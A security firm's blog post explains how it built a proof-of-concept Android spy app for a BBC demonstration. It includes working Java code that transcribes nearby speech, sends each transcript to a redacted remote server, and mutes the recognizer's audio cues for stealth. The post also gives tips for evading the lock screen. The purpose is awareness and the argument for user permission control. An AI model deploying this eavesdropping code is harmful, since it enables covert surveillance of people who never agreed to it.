How we made the listening-in Android app

You may have seen us on the BBC recently, showing how a mobile device can be used to snoop on you. I created an Android app to surreptitiously listen-in to conversations near the device and send them to an offsite server as pure text.

We’ve had a few questions asking how we put the app together, so here’s an explanation so that you can do it yourself.

CAVEAT: We were under significant time pressure to get the app ready for a filming date, so it’s very hacked together. It’s no perfect app!

How it works

I went for a quick mock up – to prove that it was possible to actually write an app that would listen-in. I took some things for granted:

The user would accept any requested permissions, because as shown by Facebook, they do if they think the content is worth it.
The app can work in the foreground. It is possible to get this to work in the background but I was running out of time. This isn’t too much of a stretch; lots of people have apps that run constantly in the foreground (e.g. a recipe app in the kitchen).

The basic flow of the app is for the app to initialise, display a screen, then I would initialise an instance of Android’s SpeechRecogniser’s class and whenever I got a result send it off site.

Doesn’t sound too difficult does it?

So, I loaded up Android Studio and created the app: ptp.unacceptablebehaviour. Although most of the tests just had a simple text bar, for the final version we had one of our guys whip up a killer graphic:

So, once it starts, it displays the image. Then it sets up a Google SpeechRecognizer object:

speech = SpeechRecognizer.createSpeechRecognizer(this);
speech.setRecognitionListener(this);
restartSR();private void restartSR() {
recognizerIntent = new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH);
recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_PREFERENCE,
“en”);
recognizerIntent.putExtra(RecognizerIntent.EXTRA_CALLING_PACKAGE,
this.getPackageName());
recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL,
RecognizerIntent.LANGUAGE_MODEL_WEB_SEARCH);
recognizerIntent.putExtra(RecognizerIntent.EXTRA_MAX_RESULTS, 3);
speech.startListening(recognizerIntent);
}

I put where it starts the thread in a separate method so I could easily restart the speech recognition when it finished.
The Google speech recognition class works by setting up a listener which will do all the hard work and then call back at various points in its life, these we hook into, mainly for logging purposes. The essential calls are:

onReadyForSpeech – the listener is set up and is actively checking the microphone
onBeginningOfSpeech – the listener has header something that sounds like speech and is recording it
onEndOfSpeech – the listener has noticed that the speech has stopped
onResults – called when the speech has been converted it to text
onError – something went wrong

There’s also an onPartialResults callback which is designed for when there the speech is going on for too long without a break. In testing this never got called.

In this case all I was really interesting in was onResults, where we have that text string of what the phone has heard. It’s here where we do our callback.

Again I took a lazy route for this. The quickest, easiest and dirtiest way of transferring a string to somewhere is to make it into a web call and record it in the web log of a site that we control. It doesn’t matter whether that call is to a valid URL, as long as it hits the web log.

As HTTP calls are common in Android apps, I just used the standard Java HttpUrlConnection class:

public void onResults(Bundle results) {
Log.i(LOG_TAG, “onResults”);
ArrayList matches = results
.getStringArrayList(SpeechRecognizer.RESULTS_RECOGNITION);
for (String result : matches) {
try {
String desturl = “http://xxxxxxxx.com/recorded/” + URLEncoder.encode(result, “UTF-8”);
Log.i(LOG_TAG, “Sending to ” + desturl);
URL url = new URL(desturl);
HttpURLConnection connect = (HttpURLConnection) url.openConnection();
connect.connect();
InputStream in = new BufferedInputStream(connect.getInputStream());
in.read();
connect.disconnect();
}
catch (MalformedURLException e) {
Log.i(LOG_TAG, “Malformed URL”);
}
catch (IOException e) {
Log.i(LOG_TAG, “IO Exception”);
}
catch(Exception e) {
Log.i(LOG_TAG, “Exception Type ” + e.getMessage());
}}
restartSR();
}

So, if the speech recogniser picks up the phrase “unacceptable behaviour” it will convert this to:

http://xxxxxxxx.com/recorded/unacceptable+behaviour

The domain name has been redacted, not because I want to keep it secret, I was just running out of domain names to use, so this one had a swearword in it!

Here’s the device’s logfile:

03-22 12:11:28.634 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onReadyForSpeech
03-22 12:11:29.930 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onBeginningOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onEndOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Here
03-22 12:11:34.711 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onResults
03-22 12:11:34.719 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviour
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/an+acceptable+behaviour
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviours
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/and+acceptable+behaviour
03-22 12:11:34.988 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.989 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/acceptable+behaviour
03-22 12:11:35.029 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception

And then we can see the log on our webserver:

Yeah, it’s clunky, but it works!

Some Problems

It’s not perfect and we found some problems whilst writing it which are explained below.

Permissions

The app needed quite a few permissions and these may be enough to cause some warning flags. The permissions I gave it in the end were:

MODIFY_AUDIO_SETTINGS – to allow the app to alter the volume – this is explained below
INTERNET – For SpeechRecognizer and to log the results
ACCESS_NETWORK_STATE – For SpeechRecognizer
RECORD_AUDIO – For SpeechRecognizer

In a later version I also stopped the screen going to sleep to make it easier to run in the demo.

These actually caused me more problems than first thought – my test Android device is a Nexus 5 running Android 6 (Marshmallow). Marshmallow was the first version of Android to officially allow the user to over-ride app permissions, which caused me to repeatedly wonder why I was getting a “permission denied” message when it was just that I had refused the permission!

Audio Cues

Google’s SpeechRecognizer uses two audio cues, one of onReadyForSpeech and the other onEndOfSpeech. These cues cannot be over-ridden or change. All I could do was to mute the media audio stream that they are played on:

AudioManager am=(AudioManager)getBaseContext().getSystemService(getApplicationContext().AUDIO_SERVICE);
am.setStreamVolume(AudioManager.STREAM_MUSIC, AudioManager.ADJUST_MUTE, 0);

On Marshmallow and Lollipop this is the Music stream, on earlier versions of Android it is the System stream.
Obviously as I’m messing with the system settings this ruins the stealthiness of it. Using an alternative speech to text service could make this easier.

Battery Life

There will be an impact on battery life, although in testing the largest drain was the screen (as I was keeping the screen on full time) so this needs to be assessed with a proper background service.

Lock Screen

The lock screen would stop it listening whilst the phone is locked – it is possible to get around this using the Android concept of day dreams. This would require extra permissions and testing.

Serving Adverts

The last bit of the test was to see whether we could create custom adverts based on what it heard. So I plugged in Google’s AdView, and there I found the problem. AdView allows keywords to be added to ad requests but it doesn’t actually use them to serve adverts.

See, I even had the code to do it:

AdView adview = (AdView) findViewById(R.id.adView);
AdRequest adrequest = new AdRequest.Builder().addKeyword(matches.get(0)).build();
adview.loadAd(adrequest);

Back to the drawing board on this, or to use a different advertising provider.

Conclusions

It’s easy enough to write an app that can listen in to you and convert what you say to speech, even with just half a day of gluing random bits of code together.

There are some hurdles that need to be worked through to make this totally stealthy and to get the ad networks to respond.
It looks like Google’s taken the right steps with its SpeechRecognizer and AdView APIs.

Finally the best defence is to allow user control over user permissions, something that should have been in Android a long time ago. The facility was in the OS as far back as Jelly Bean, but removed from Kit Kat and Lollipop. Google really dropped the ball with this and we should question why it took so long for such an effective defence to be implemented.

Test and Simulate

Detect and Respond

Improve and Protect

Comply